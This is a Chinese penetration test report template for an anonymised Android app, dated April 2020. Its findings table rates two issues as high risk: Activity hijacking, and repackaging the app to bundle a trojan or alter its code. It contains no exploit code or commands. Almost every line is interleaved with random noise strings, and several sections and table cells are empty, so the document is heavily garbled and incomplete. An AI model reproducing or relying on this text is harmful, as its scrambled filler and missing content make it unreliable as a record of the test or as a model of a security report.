+ T, V z: z; w3 Y- K6 ?# R
* A& k7 w: D( d$ Q
" i0 w( Z. S( s- Z+ I: ~" g7 ?2 Q7 O. T- j% p2 {+ J
L. _, O1 y: v8 m! f
! `1 O/ Q4 L0 T) |' o! w( T
/ H* j) i1 K* d5 [: Y4 S5 U
( j4 q9 R5 y" h7 U1 q & `# N+ @3 ^7 `7 u' C: p# K
. U- v/ b/ C& k
" U) c9 P3 T# ?$ l6 [* |9 A0 R
i7 P3 Z- `$ d3 G3 q 文档编号: 6 _7 y2 O! y; W& Y+ `2 B
" ?" d- B' b5 W6 F
: t- f/ l. L/ K8 X3 |+ J
8 X$ R8 x1 L8 i/ L- M! `+ y
- O& j1 X. G' {6 T0 z+ _, F- ^3 u- A) x7 }- t {1 P
* n t: y5 v. O7 v
7 m# m, o* K% n% N
$ Z* b* D9 ~9 U6 M, H# m1 t
# S& D3 l$ P. P: k& i8 i9 U
. w4 C ?- K# p" c% `- z9 C6 x& f. X
0 F, ~( ~% g& E9 l/ U7 [9 ~ 5 O4 A, D) t" ^8 n; v" _" j+ K. o
8 q. h& t% K6 S, f
. ^, ~! t5 K, q1 h1 n# k& J" N7 J
$ P4 m+ H* k+ w1 z+ J6 m
+ w A+ m8 x, U/ V* h* t1 A
, \9 o" H( ]8 D1 o; ^7 |0 [
6 B9 O# q( x9 V5 F: N# @% e$ |( r1 j; W4 b. ?3 ~! ]5 ~/ w
3 S& N( ~% n3 M; z) G0 o- v
& o( k7 p6 e# `& g0 i
% O- C" N ?& ^+ \
: }, m) y7 c ]5 p
2 Q( b$ e# \1 E/ Y! C8 s' k' t4 f( @' s4 C' g8 c
( ~, S2 {4 e1 u
# ?0 e4 V( V8 K& }* m/ E& s" z ; L) s$ N% {9 Y8 D
3 l" ]9 ?, M& Q) j/ ~' s* F& A! P
* s" W7 m* x) }
$ _! g* m4 W8 }' ]8 x7 o
8 A. V" ~6 R) \9 a
( A( Q! \9 ~( {7 P
: |# v+ G4 B- ^6 b3 c
, Q8 D' u4 e- o/ P 某某某APP渗透测试
7 o( |/ }* j7 z' G/ N( G
* e4 y, i7 _; R0 {6 b
8 ~ D( w3 v! a* n; g4 x! w( U
5 |. |) c) p% L/ M - S R5 g8 W- Q# p% ?
. g; L* k' t" k2 ~ e/ A% ?
( ]5 d! B& R1 }; S I5 _6 G& [
2 y/ N5 m$ V3 A7 b& M- Z
8 N4 m" L' L- d1 W% A( i) ]+ P7 o$ Z) h% ~0 N
7 P" Z/ b2 W1 w
3 e: ]; W/ I1 \0 r3 b7 x6 a
# O% v( c( J8 U- y* X$ @6 T3 S$ `* l/ P' w% b) ?
/ Y h! c ]# b5 q8 ~- B8 ~' h! M: r
1 }+ r+ y# ?0 P3 x5 k$ A
6 P4 J6 f) O* q, d6 U- @' ^
! p& s8 z& F! w. _+ v
, Y7 |' q1 t8 ?
! J- u+ b7 f/ y/ l
" b/ _8 j! I- u( D* [
5 g" [9 M! F8 Q, q8 y w7 O. }: J M8 [$ m) k4 E0 d
. N, H* L- z/ k1 j9 u' S% h3 j) M1 j9 ? B( g! X; n- M2 t
# W1 b& d) v H9 u+ ^$ ?. W
2 c$ s1 y- ?; n, [3 l
8 Q9 N9 m# L% m" O- D* m) h. U" R9 |9 p/ ]: g, B
技 术 报 告
' o b2 r% E- n0 }- k/ \" u9 j
1 \% _9 t8 i# c* V
3 t+ P& S( L( X' p
# D& a# E1 f; d c5 k
* v1 t5 S0 c) q+ E |* t+ o: R9 c$ j2 c, H2 \
- w3 Q4 e, E; M) X3 N- k. X0 L
9 X2 G( U R1 h4 F
7 {; P8 z! {8 \& [, @3 v
3 k2 R5 R5 y7 n. \% n* U - k4 `% ^! _, ?$ B+ c# w8 G) `
d4 ? A" T E4 a+ {
6 w4 ]2 ^( z. c9 i1 C
; p) e2 m. B# v: i$ ?- u. H
. r! {9 Y& e/ \/ a
! Y/ @ t7 c8 V
' t8 C" H, s1 l' t; h+ ~
3 @4 z! k# o# q0 V/ w
# {4 J d& t* r9 ^! f( a) O1 i/ L/ Y1 M- A0 O! \
3 f/ T/ U5 y! J) l6 {
" F9 ?) F. q# C3 T1 W6 d* C; G 6 M' x, }# m+ O4 D$ ~! \- U
3 d d, z/ g6 P0 p% u0 f, j
$ v1 G3 c9 a; U+ K/ A; S7 |1 X4 v& [% M# H
9 ~: z I" C i
/ N0 x) V% P3 D* k. u7 k3 x! Q4 s
5 J- z! L* G- Y$ u: Z' K
2 _( U! i. Y5 {; y
8 _! w2 o+ g K& N
( x* H7 h0 k( c4 t
) t% ?% g+ [) n$ \" m
6 k( i0 J' P& p! M* R4 U, S
/ A/ y% c1 s: E& y* Q/ B; N/ O2 ]/ \4 I4 m. {, c) k* T* }* C
~% ^; W& P7 J
( F# [ g7 n/ s3 z7 j! W6 j0 `* ]" f
- g% L0 m% Z. o8 V8 a
% k9 q# B! i( w* d : ?, V4 H7 ^; i9 a; C- `
0 C. a/ b7 j+ k: q2 G @( |. r# \
7 i8 s! h7 Y$ {' Y. a2 d; P9 f' }2 {6 c5 b" v
+ g- i; H! @8 B3 c
% I/ {$ {' W/ |) o0 F4 ]
& N" m# c) n7 J# `4 h9 n6 O$ `0 D8 P
& ^+ l! D: G* g5 }6 J) `4 q# d# [ & Y6 }$ n2 [) R; ~
6 e1 @: ?4 I; u I! o3 x* l6 ]% y! `' ]
) t' H" @4 B. ?6 i; M, }
& n3 D/ I" E, }# N$ H# O / g! o9 [# l8 E; g6 o- M
( _4 S( ^ C2 Q; g7 r& Y! ]
0 B+ ^& f: A1 o$ |$ u2 x- {
4 }' Z, c! ~3 B, Z
1 V+ z1 n& U7 n u4 y. R8 t& S* Z* g9 U" u- G# \
4 ?+ @0 _8 ~4 l' `3 V+ J8 n5 }* V: o
3 w! f5 m0 p+ k w7 i: J
* H1 I' V+ l! f$ t3 J* }6 ?5 c" L1 I/ e& H& i; `, ?! ^) h. J: y4 G
1 N% t- U( D, i# E S& r+ h7 |7 ?5 R8 ~' P
( ~0 P2 ~1 K' n4 s% ^
" L( d! @3 X- |6 M0 `
D* W" e$ j1 _4 Z
6 @ V% B- r7 P# V3 n% [
m6 d/ g# Q6 |- @( b. n- E& l+ ?' }# v: I9 M
$ B% Y! B, p) b+ _7 X: Z' C, E3 @$ t" f u! o9 [7 z
m5 B1 u0 C4 `0 c: {, R4 Z ^% y& m; K- W5 X" f z; G: x& m2 Z s
2 @+ i2 U5 t* m7 ]4 @& u; q5 i' z# x
6 J- m$ `5 ?/ u1 q: x3 Q, X$ P" r/ \+ N, d
) a+ [1 I+ F; }- A. Q& z
$ e, \1 a8 q0 ~& D6 h, ~5 h2 [
- F3 ^3 P+ @; g5 ?) y3 v3 u' o/ }5 g6 z' Y4 v% [ e3 N. n& E: r( E
' g7 C& m; T" Y v
6 F, m8 N$ z" Z1 x! e8 B
& s7 b5 n( h. _) A: o- G2 Q0 U0 J. Q! w7 e1 @ k
( k. b3 W# s5 P7 j/ q! @' e& ]8 q$ u! t, \/ C
) Q7 X6 G. b5 |8 \. W1 ~
0 f1 n4 @, h J; H @$ b) Q
/ N! L h6 @, S6 q3 S7 H3 f# S' w. u' x" P8 s5 W) w
7 V( w1 R- j- p2 [) r4 U6 e4 f- N
( p: Z& V- n7 ]. C6 Y
$ ]/ J5 M5 t: R1 c8 t; u6 G
( W: A- ^& a1 g& X8 K" K
0 _+ d; O/ h( `. [+ d. l6 c* u# c3 L) I$ G5 @( d
0 f1 b# \9 q9 g: I
2 @+ ^- E6 _! s4 |6 x/ \" ` 0 ^6 {. `$ t5 V9 _$ Y& ?- c4 ~
# O6 B1 J% z! G7 B+ V+ y+ M: [
0 c/ n$ n9 D7 K
4 P# V9 I6 [! `4 Z
0 z+ I, R* \, c: m" Z) H# I: M! o9 {& k8 }3 N3 E. I T, T- e
6 v/ @- @/ X" g+ | m4 f
4 m. Y) a# O0 v. g3 F S6 j
$ I, Q4 `+ O! ?9 V
. L+ n- }$ X9 b G4 \1 d2 @4 z
. Y3 ]! g! K$ ^+ I I$ D# n% N9 b6 e( K1 d7 I, M5 H& D
/ B$ \' J) g& h) }/ [( q7 M' A2 \! _8 S3 R" U
二〇二〇年
3 U% m: ~- ?) a* J4 u1 z3 T5 r7 q. c7 z8 |4 Y7 @% ~8 }0 F. B
" S, P; e3 H9 }! @* T
: N9 Q. z# V& T5 e
2 m2 e+ @2 b1 N. D/ W6 {
5 A, p+ K5 M$ X. m- \" p( ^5 E
& c- K& |8 X$ F& e5 M5 z4 L0 R: j/ W7 e9 _
3 U! T- K; w/ [8 o( T2 c
0 i' O! l% l+ g% L. D8 N
2 P; b" s3 _0 z' u( |! X9 W1 C. G: ?3 c' c
$ z- ^% X, x/ [' r' D1 |% C" T1 J! n
! P& k8 R d" A+ e# g" t/ m
9 S' K8 i: U# q* h! p6 t( ~; d$ k6 t
7 ?/ g$ {; m9 H+ K, S4 E( q
G8 ?( D4 \6 o
& T- _/ t- |1 ~6 {* m/ O( G
, |- R# P" o& K+ @0 T 7 W' i# K2 x) h9 o
. I+ }" J/ Q3 O- m$ s
目 录 ' o' S/ Q% y! m2 t3 |" H- y3 N
% [; u$ \1 b% A# b( i$ A8 g) y
- C& F* p0 u* h
$ R7 a! `) \7 Z+ y9 Y' t8 V) d6 H ( w2 K* Q# p5 B$ R
7 J3 e) u* C% p3 E% W0 L( g
! `# X$ M& f: o
0 U) }" S* t6 I8 G! E( K" Z
3 [; ~6 o2 R; ~- ^
( s: W/ d1 q Y" Y; |, _) k- ^* v
1 z" ^6 {' m* N: b/ i" \* \/ @3 W/ o* ]9 |! Z) ]/ x" d6 R
3 I5 Z, W9 ] O; f! z
2 x) b$ ]$ U" s7 U4 c0 M
1 概述... 3 - z$ Q- T5 D( p# B, q) y
* F) d( C0 R3 {+ b, `9 Y4 c2 i
5 x) ?+ O5 @ [9 }6 A" m+ M' h( ]/ L9 b
5 R5 w' Y& P! a6 |- _, q
( p' r2 ~: M' u 1.2测试时间... 3 4 u3 h" n" Y% Z4 X6 i0 G8 \
( ` n2 R1 t t: I* u3 V% l- _0 e
8 U+ A2 u$ o! f4 N" }' u$ I l- v3 W* N7 O8 p+ P+ p
- ^4 Z( l8 w9 t
0 l; k9 E9 c! }) y" N2 _5 ` 1.3测试对象... 3 0 M& F4 t8 x3 |& K7 y
- B- a6 h M8 D
: a. u3 n% |- Y3 L J% c; h# ~. |: u; W% M( n1 J
+ K! B1 [) d! a
- E+ W5 z2 T1 n 1.4测试结果... 3
1 t5 K# d6 N5 ]9 O& ]: G5 i- l
/ r2 C5 e& S. x+ {( x* i
" m1 `3 b |4 s) k4 V! G 8 e2 F3 ^/ C" ?6 }# ]: m2 |
( k" E+ v& }& ]7 Y$ }( B8 b9 t
2 检测结果... 4
+ Y; I# D, o# t
- G" T( H7 T5 U- C% _
1 @# y# I8 O- J- v4 p* m; c% c5 O" W
" H4 {+ N8 Y: w9 G
4 b! g* f. s; S: I( i% I 2.1 某某某... 4 . ]' r9 s' ^* d) Q# y# X b; Y
+ ?; b; a; t3 M$ M
: S: w+ n" L3 ]) _( Q* k7 l9 I8 f8 |
. M" p9 j2 x7 W. l9 j" R0 U+ H5 C
* n- F" y3 |" J t2 L& v 2.1.1检测目标... 4 " ~( C! H6 b1 }# O- c9 v2 R! y* @5 \
! _. x$ |* F: Q/ A" A/ M* ]
! W+ x$ ]$ p' C+ ~/ R; R, M
8 J# m2 H! K& \% t
' Y- j/ H: Y# o% O
2 ~$ X# u+ C8 w2 m! [3 K 2.1.2检测结果... 4 ; a, k' J- ~2 Z0 v$ b
! @! a; N- l' c$ Q4 N+ d. N0 \
; U9 A# l; w1 q2 U; k
3 E# {$ d) F5 y: N $ s* k9 V7 K! a M0 [8 I' ^7 b
7 |; Y# @4 F+ Q7 b; v 2.1.2.1. 4 " F; M3 C+ b/ P( ]5 n5 `. @' _
: I$ v6 S9 O; k, l
q. D0 f+ y* G4 f C* w: `
- h; Q0 T2 q( G3 ]# U: C; w * T0 g: R- ~& ~* `% t% P" }# L. l
# T' @$ w, b% p" B/ c7 C' {
2.1.2.2. 6 1 L7 q. G) W) P! r4 @. ^
+ k2 Q+ y4 V8 T6 Q" G0 R2 _
$ { l* `# U6 e/ x
v. L) O( o9 F9 |* L) `9 f$ h
' ^7 z2 c9 j/ d5 Q. R- q) L/ R4 a1 N6 } k5 R
+ n: ?. I1 q* Q( G2 t$ I6 Y' F
) h; L0 S) r. u) f0 l6 K
& ?: w- K4 k4 `6 I$ Z3 D6 D7 V
# C7 \# k6 Q. T1 Q% ]0 J) H0 K4 j. {# \! X2 G/ r$ W9 p" H
" S% |$ |' I) y# H+ F6 J 9 g1 F. j/ Q; f6 B3 J. e3 I
7 m9 ]4 Y) U* [& k6 _) B$ }# a
" E2 ^: }/ C6 O0 q! |0 M+ V9 Y* W: M5 _. s' R) l
6 }5 r. z* w- {, [- S
9 p+ B: y$ \8 q% |) |4 s& G! e5 g
0 r# e& x0 A2 P; D8 Q; @, u
8 W& R$ L# C' F9 R 1 概述
6 R! B; D. G, D5 O. M* O. ]4 M9 y4 b4 m# N
( N& U; U' F6 k5 @8 R4 p# u+ Q7 b5 F7 u/ D
5 z* s' |/ c& [% e3 x( |
( \; k2 H* g+ z* G1 b/ S
1.2测试时间 " |% f2 d6 a* r8 Z V8 g" K0 ~, `. [
, k9 i8 c3 z6 n( m
0 e Z, r. C7 Z% {( C4 j3 R* s
. D M0 g( N* y1 c
. s' }# J3 M) L4 m- i# u& a, p% L1 L& v* g7 F7 v
6 ~8 ~0 ` J* l3 ?
2 {9 L2 A) V! Y& a- q/ _ 4 Z! [- ?5 g. P4 k0 a
; }/ S' c0 _, X& t* x5 @: n0 |
. Q1 y8 F H( T, [$ v h; b3 m0 I/ S+ S/ ^
) z l9 W! {& K1 F ]
) J- b* b7 E" [0 ?* f7 q 渗透测试时间
4 e6 n" ^+ t/ b' P; ^ w! u2 U: Z
0 R3 [0 C, ]) B) f3 o4 p: ^. [
# F6 V' t; }6 y% d/ d+ E2 j/ y |
5 n7 @, \2 U# M. A- J' x6 ~
% _9 c4 \, A& g* Z- Q! t0 _( m3 R7 x
) p$ c$ Z+ L v
! V3 ?4 g- T, n# \" K5 w' V
f' L& }: w6 z3 r( g, }9 D/ ^( v4 \
. Z5 S0 t+ v/ K1 {% G! }
$ i* n% H2 p }9 Y , \- A5 P5 ^, q- }2 L. Z4 G
6 L) c5 b" `5 X6 c+ V! G
起始时间
5 N! F) d; m" L2 Z% q7 H) D. ]
$ G9 f/ `% W+ e& K
' }3 h' r: Q( B2 T: R
! S2 Z8 g1 l) S' A) J |
( H0 N5 ]: w7 l' |
6 S! y! n' E+ \* }
- v1 B( h. e l0 a# ?8 Z& W; V) }: C
: U2 J3 B# c2 ^) b5 n
/ R" v! b1 {8 y0 r+ ]3 y
" A! B+ I. d* N4 c 2020年4月6日
. ]3 \, A* ^% z, ~- ?& W
0 |! e! f+ T9 K) p) w
) X9 O% v- D6 I; a4 T- v
" R7 o% O/ M. ~ | 5 v1 w" b/ }0 a9 d8 w7 j
( y" U0 W* \9 }2 A( J6 c2 ?
1 | F) _* P. D, H* [. e t( r& C( {( J! ]* ^2 ^! E+ Q
& y5 p5 _! B7 n4 ~5 u, q
3 d# ~: |: h+ Q% m/ C6 x 1 |" \& \% F6 N# n, v) j1 U
: o" f: D, B. E3 w6 K4 |
0 E, a t4 ?3 n7 ]
" U! K* R7 N1 }. ^( b5 L( N 结束时间 * Q/ P$ k4 q3 ?& O, p; l
- J0 W5 L* V7 U/ z. v- H
& ~- d2 w4 s0 N5 \8 K x% K$ d" ~: T. q- G" t! {; K/ X
| " W" X& \/ |" D# A$ A# f
- _9 G# w/ {' T+ f0 Z
; b2 l8 ]6 ?8 z* Q3 v5 }4 h/ o5 J2 s1 B; B2 C( F& A
@# |& O5 T& b, z+ T; ? A5 \2 i$ P9 ]
2020年4月9日 ' }0 m" e, z1 [ T }
/ [5 m( p$ ]7 s* h) C, T. V# { B; O
' }/ d0 W6 R& |4 i7 Y1 a8 S2 F# [, C8 E# n! F: ]4 l- X
| 5 V; x `6 ]: z2 r0 K j
$ \! T y5 l" p4 S3 y0 p
/ X2 L! o4 l+ J
0 x8 r4 B& |3 I# l0 r3 J8 [# f
; l9 B3 ^4 a0 e& c# G/ G5 U; k) Y+ T1 W
7 F% |( \) Y3 l8 f7 Q1 H
& \1 k. J$ \ n0 k& G+ O( w! R
1 b8 c' h( m+ z" i& p x8 M) f" c3 q0 s+ j7 w
1.3测试对象 : g4 g0 y3 x h. x
* X- e2 [$ n! ?! r9 |
' o+ K# y! n, g
4 q4 b6 e( F. E0 W3 g I/ c5 a1 Z
( P8 J) X x. f) c
4 s% t2 }3 V$ Q/ x5 s# X
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
6 _( v! N8 \: l8 r2 v# C" S* X
& `( W% ] _0 ~- u0 u* ~
- j2 Y- u' O U, e1 R N; H+ U
4 ]) R5 s( d% U: m5 ?6 N
4 N) `" a* O) @# V6 Q7 N3 S( B% b+ J2 T# @0 ^$ a1 k4 u
表1-1 检测对象 $ \. Y- c; I$ o* k$ A d
, c0 |" V" y/ {, d1 k6 y! F
5 V0 M* @# n) S/ e5 M
7 w' |# L6 J* J3 t* C ( Z5 y$ Q) X! D$ P+ @9 `
' h; e9 v" f: q, K) W t; r. b
8 d. _, L$ ]- A) D+ }1 ~3 D$ n l# ?9 T
* x6 f3 g2 w+ y( X& ^( K
5 J- v/ M# D- O% ]
1 R; y, ?# B. u1 ?3 ^3 F5 i, W, d% z& a4 c& i
# h' {+ {1 b' V/ L
7 |$ f' h; k1 Z2 B1 _
序号 * }2 w& {$ t3 c; i6 S2 Y" l
5 B) y! B! X+ u4 E* Z
1 `9 Y3 T5 [5 t- O1 H
7 m+ T) z5 B5 C/ \ l |
1 B! a4 v# x" L: l0 I' b* J! z5 M6 j8 A: c! j% N' i
/ `( E6 L8 e$ F7 ~9 w. ]
. t9 X0 x- [! u. k* Y8 @/ W
0 f0 o9 ]# v% t( I* ~- K1 V- i4 k6 T% o+ w1 X3 I9 _' J( G2 ^3 @, P
测试对象
* k+ x2 S2 B" s. y4 P, ?4 b0 a: f
7 U2 G7 p' @/ ^' W1 Z
8 q' [4 C4 ?0 y, g" t0 o9 K6 C) F9 Z
| 6 w4 T; i, m2 W& l I+ [
5 b. W1 ?+ E( ^! D0 y
4 k7 r" `0 v5 [3 _3 }& R# z; i0 |8 P$ T& y) Z; t
0 G1 K: n5 i7 k6 J. Q% S* @- E% H
# o5 J6 ^! Q2 k% j: {$ B; k* K3 V
测试地址 + H/ M4 S% w& P; P' K6 ]& H1 V, Z
, j: {9 F/ r Q0 f; ]
2 }- p8 N9 @- [/ ~( O8 n* X: `7 R
( ^$ F% X7 A3 ^7 @
|
! N( a8 w: Z7 P8 S2 M/ @& ?* R8 @8 t* `6 h
& n* _% ~4 r) V! l * C0 k3 v& W- v' r5 b4 X% X
F [& \, ]; C+ s5 g 8 Q& A# ^1 X8 G/ f8 @" d
: \$ F6 m4 l2 I& j+ l2 m
安全漏洞
3 `4 c1 @1 g0 L R4 I# h9 R' ~1 A9 O! z* [1 v; a
" s$ D* o; v- s/ \: E. ^( f# _0 R3 X9 m
' C7 O, E: O& a
|
: m1 D" }* Y) W+ b- s% r, a3 _ U2 U+ q3 q$ l/ N: ]/ |
1 ]0 Y. v0 e. P$ s0 ?6 B# T/ ^* H+ a0 L6 h& S7 }
: f3 d! C0 `2 E5 K, \+ Q/ n+ U m: c" W
8 u: Y2 q% O; i5 p- G& j& b
; U! r7 o4 B4 n+ r5 d5 W
* O2 p" b: a+ ?6 T' T6 ^
5 z- X! E& |. _/ s( e 1
; w2 t" l9 x: W0 L/ u# t7 z& S; ?, B x9 i# O ]9 U9 q4 m
; L8 z5 }( {, G; A
# r1 {4 M) ^4 m% r |
! m! h0 a& i9 u5 P& D! G4 j: i8 O9 `
& J* j1 U+ `2 s+ f# C# K, ^
# {! j& R; A" t) r
2 T3 N% C' c8 S9 J. D( O
8 ?) e& ?& `7 u$ o5 f; A' c 某某某安卓APP & P! Y$ K- s# i
O+ C$ Q6 N, X7 @! ~% V- b
0 { C: ]8 G @: Y
" g3 i7 {+ B& S |
3 I+ @& l& R; S% ~
' p2 [$ y2 m8 r! ?% a
2 V+ z9 }+ I& V3 F
7 r$ R _- S0 a! ? % a' k1 T9 M% A' H
5 U/ U# w" L8 I
! W! @" n/ t' ^* ~8 F @; d+ t5 [! ] t4 \
# a0 {8 R# o! ~
& M/ z( `7 p& Y8 Z; @
|
" J" O9 W T( I' `0 S2 h& p$ V) R: I; L1 [
. C1 D3 i! F% o; y5 l
1 ]. u" b7 O3 V/ U2 o $ c T. k+ Q& t: M' y) n* s# Q
# r$ h J* z( W4 J- W7 ^; J
2 2 h0 e: a2 ?0 w! W
* h9 d; ~: L+ @. L4 M
) Y- w' C# k! G8 l$ }; M7 e* O
! p a4 l; o8 U9 w | 7 t$ k! O! c0 v5 g! K! ^# `4 a
8 Y' h' F0 M% `/ p
$ O% y' w9 j7 B4 a# H. f4 b; a
$ v( C" ]# ^. S8 G3 C6 ?
; v: g. m! ]9 E# F+ t3 F `
* p' t* ]. ]/ l+ [) \
* T1 _7 X/ Q5 o5 u
4 _. x C o3 M& M: v
$ b7 K" `* F# Z& Y* M" C6 z# b. F- E3 K' D! Z6 g' O/ b$ E. P' k4 }
1.4测试结果 ( V8 y" {9 X, t s3 ~
0 k6 q( S% I$ V
; q0 f' A! D9 Y" d. U. m
, m" x: r* N. W5 H& x/ i
* R) y% `% N8 }1 {: J8 X l) w, n
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 6 e9 C0 J! o3 N
; t4 W8 F) n& H6 F {8 c+ i
4 p! N# o+ g( |( \/ O2 [. w2 j
1 k. G8 y- W- }: U7 u
) |8 U" Q4 b( Y; p" | f1 g; Q- D' _: R+ W/ g8 t
v9 }4 ^9 m; V) ?1 j: _' f# o
5 Y- D& A& b/ a
/ g7 t. B. i' w8 E+ s' E! s! h
% U; N+ f% P. o' j- e; u
* K. z( Z7 T& q5 |' ^. {3 R" ?' U# n0 s
' U& i2 l, H! F# b1 ^: Q% i
" d# M+ a8 r# v) y4 Y / L# z" J, t0 T" {9 d* ~
; ? k* Z; A% ?+ X4 ]$ R6 V
4 _9 a5 c% R* D4 s# E( J& \+ j, |
# M! P% w" ~) I/ y- a. j# W 0 j( Z6 ^7 L' w% e$ `
/ w1 V9 u# C5 v
4 Q" D4 ]2 d/ d( f- T6 B. i0 Z) o* Z; R; R1 W9 T# g1 s! t
序号
& ], Y J/ O1 X6 K0 i ^9 |
" _* ?, P G- Z- a8 _9 Q
$ ?: U4 s: ]' p( A
/ L' ~5 w6 `" c: G | 5 v- `2 [- s5 G0 N; G
: A, K) X3 G( w# s, u% F0 L
3 _4 `0 H4 V( A2 u: z, n5 t
& |4 h) b: c0 F l D0 ]
: x% m5 v3 q1 T0 @4 a0 l; w; C
) L; ^# |6 K( J/ j& ^4 ? 系统名称 + Y6 l1 U7 E' }
$ m& m( e" f# Q7 K. {7 o, b1 ~( Y( p
6 V* ] {( H8 p. v' b, ?$ W
) F/ p5 x$ {( o# q, _7 X) M |
8 n0 ~7 E2 }: [' o( E# Z0 c6 U" L6 x
( Q( ]" m8 s5 \, Z+ g : @0 l) _" V A& P) }! u
2 a( F* e; P4 g + s* D. l( b! h5 c8 r. j
- l4 E4 c; d a 漏洞名称
9 @- f# _9 h/ Q) a, q
7 R: ?) n7 S+ H+ @" p ( B0 g8 v4 S; H$ { T1 C" c+ x: s
4 R# @) C5 `; h: \0 o |
1 n, a+ V& ~( ?. O; x7 f+ y, D
/ W9 e1 I# {9 @% b$ \+ S& @( F; m / N% \0 a! z' b7 h; s/ M2 J
7 ?2 P; K2 W' T, T
+ U7 Q: [9 f S# ]; T' A
" N- _. U9 x8 P4 Y 漏洞危害
% Y" p8 ~2 ^( e- ~8 V8 ~ @) T9 G! `8 R7 {) }; T
- C( i" y, F0 P# \, n( n5 v6 ?& D0 t b( r& m+ V6 {
| 3 M- u' ]! r- ?2 r
0 T+ u8 r6 T& Z. { 0 S/ }4 r' w- q3 p0 R' m2 e
2 p& ~4 C) I3 s5 `2 \+ ^# Y
9 j% ]: z# C3 W& q8 v! s
+ I& O% J" k/ a. s; L: u 修复结果 3 `, C1 E! d, p- D z+ Y% C
+ I7 l" Y5 k" B 1 L3 C: I1 I+ A! |( s
# z+ _# w2 I6 G5 W8 Z/ F; w9 Q |
3 U1 w1 J d# i7 S; v r7 Z
4 z7 z7 M* b. G* Q+ C
2 q# M: M1 X0 U3 ?1 d. z* y# ~
+ L5 X' n, Y- ? P C( g3 F - p& t" x$ T# V0 F3 @
# O- `% y' r. x% t8 @
g3 I5 h8 u; K k/ A V f/ Q8 N9 L7 D6 K" u- h
5 W( `0 M' i& u) w# r, c2 E
! w$ ]: k y' m9 G! y5 `6 H 1
" c6 D/ O$ ?! Z9 P2 o( V& y* M, x5 R* |# |6 N# w% M
4 {& X' q' i& d# P2 M1 T
' t$ R6 o) \9 b3 C8 R% B- L
|
; b" a# L; @* I/ d9 ~: E' I5 e& p# o. v# ? ?+ F0 W, V
! h( J. T% E& c- o: b& X/ a, z& y
+ k! s0 o+ `1 A& T* ?
/ p9 ^3 W: n; P0 X6 M' I- ~+ g/ ^. S5 }" C
某某某某某某APP % y2 J/ L6 } i/ s* c: h; J
# I: @$ i, U. g; L8 @/ y }
: `: g# e8 o* b* @( r
2 N! \ W" u$ C' I) X; u; l: C1 O |
) ^+ q. p; W" o9 y' g' T( Z
+ a; N) I; M- Y
3 G9 H" A: S3 a: Z& `* d8 l/ u/ m* Q: M. m; H, ]
6 g. D+ N! \% x5 g2 C- K, F9 X5 U: f, u* w
Activity 劫持 4 r, I: _5 I4 m; I& ?0 @
9 l: J' Q7 w L1 \# z$ f. h
! {& Y0 G# R4 S' Q' U" M+ y
- }( \9 K! @2 @ H
- q% U! k1 P ^# v8 [
" _, n: [3 l& K3 e7 g) I# { 2 _5 \# j9 L& @1 K/ ~& q/ K e
$ ]/ m3 @6 B; Z6 \( u F+ Q
8 H" [9 T) V1 M9 `/ x& V2 l
0 s0 V1 W" W# j |
* F$ v' m. F) D$ I2 t5 O
. u6 r* _. H2 D0 i
- y* {3 G" ?; b, y9 ^6 y/ F
2 S; }" T. A. {! ~
/ Z# u: q+ U4 V1 y/ J2 k% M; j& M
1 R, |. { P! p3 [ 高
6 v9 J7 k! H. x
/ A" b6 r1 ]8 E+ Z8 K ) e: ]4 Q5 d: [8 V& j4 D2 ^' }
$ f6 ^; ?. W$ k5 z5 [7 T! M
| 2 s5 q p" X" o9 w
+ F4 S2 M/ | q, K 0 A- T+ ]) \1 R1 Q" z% [6 T& j
; ]* x& z/ T% f9 ~
( s U' W; ]1 {! i! C# l* M E" V! Q; `! V3 D0 o% q" E4 L6 `
4 B- {; o; `, P1 K- }
9 E. I; S: V# y. k% P! N
; A, J! y0 V3 r' E6 v% N% F% J6 T( F- g5 |& P& V0 `4 f( x
|
: N9 o' k- p, A! A1 g% z3 `+ j9 Q2 g5 ~8 h3 C5 D- |$ U8 o0 @
' w( f" z5 P- `) h2 V0 V" B4 f
6 v. \/ [* P( P
2 n- W. {, ]0 b0 s# |/ Q# K, x5 S) o \5 Z" s: |8 g
" m8 n1 U* o; L$ L/ @
! r% C4 o# b* W! e0 d% V# i& E. g3 g# u . c! P4 a( d* J
. B- A5 Y4 v! _0 q" |2 y7 ^: t 2
; s+ u2 h* B. h) \ B
: z# P9 x1 ~+ P8 o8 o " |7 p3 ~; Z( z5 Q3 q1 e7 x
; U7 b, l s4 Q- [: s% T
|
7 x8 t! s$ l8 c3 \) v& {
- m8 X ~" b" b+ s ) n% k( P9 m6 Y3 w. V
, F! V+ G) K) V" l; j4 C: b
$ A! B- ^4 X9 j# V4 ?5 N* |
! P4 N; J/ v: G F) g% N3 M
某某某某某某APP
& H* Z' u2 `" X. n o
0 C& M/ \" X/ i& j/ d
! E q8 _6 P. Y \5 |) x- r' ^! @6 n2 c
|
4 ?, {( j! z- V8 _/ I6 V2 _
* g( x4 ]6 ?; o, g: w
9 Q$ o0 H9 {1 ~0 t, b
2 w d# M4 f( X; m F, m/ a/ s5 b ]* a m& A. B' C
* m8 {8 j# o, Y G 反编译二次打包捆绑木马、篡改APP代码
( v6 ^( Y7 N2 j* d, A( a w& N& {2 v/ d7 [8 s
A" Z( I& s! `5 ~
4 v* G8 {5 H9 g4 w |
, B. V6 T, _9 W/ }' A* f! M; V
/ h( Z) o Y! `$ @$ N% y. M6 C2 g/ O* i0 B
+ x9 j0 o" l5 F7 ], N0 r e: B' r' D& e* T/ [+ P
高
, t" O( c0 ^" a4 d0 s' d
8 ?6 F" j" I0 y) \/ v) N
5 q6 I! Z1 Q+ b9 H4 M! K
( @' n3 C$ _# X3 ] | % M) A/ q# y* _+ ^$ j6 ~; R( O
8 n. k7 {5 t, q% S2 D z 0 ]9 A3 C& v/ `$ [4 g
9 D, _5 _& i7 ^" O7 w% {* A
! h" R& `& P* h; }- h: z$ h# y- s
: d% h- F% y6 x, x! c; Z
$ i# H$ S: _+ H/ S% u& T7 o8 J! ], Z3 M; a: O
6 \7 ~8 m& G; |3 z6 [
7 e9 k: Q1 D5 b4 X |
3 V) N& z; _7 q! c. v' \, I# }$ e: G7 y8 @
; m- t2 O! _. _5 O1 _2 M$ @! z8 l( ~: W, l( i7 T- v- g
: H8 q0 w& I8 N2 m
. W& |# B1 y5 L" I0 K
% ?7 b: u; u+ m* g$ Q
9 T/ ? F# A/ Y. m9 {6 r+ v2 q; l
/ `. [6 u% F2 V7 i
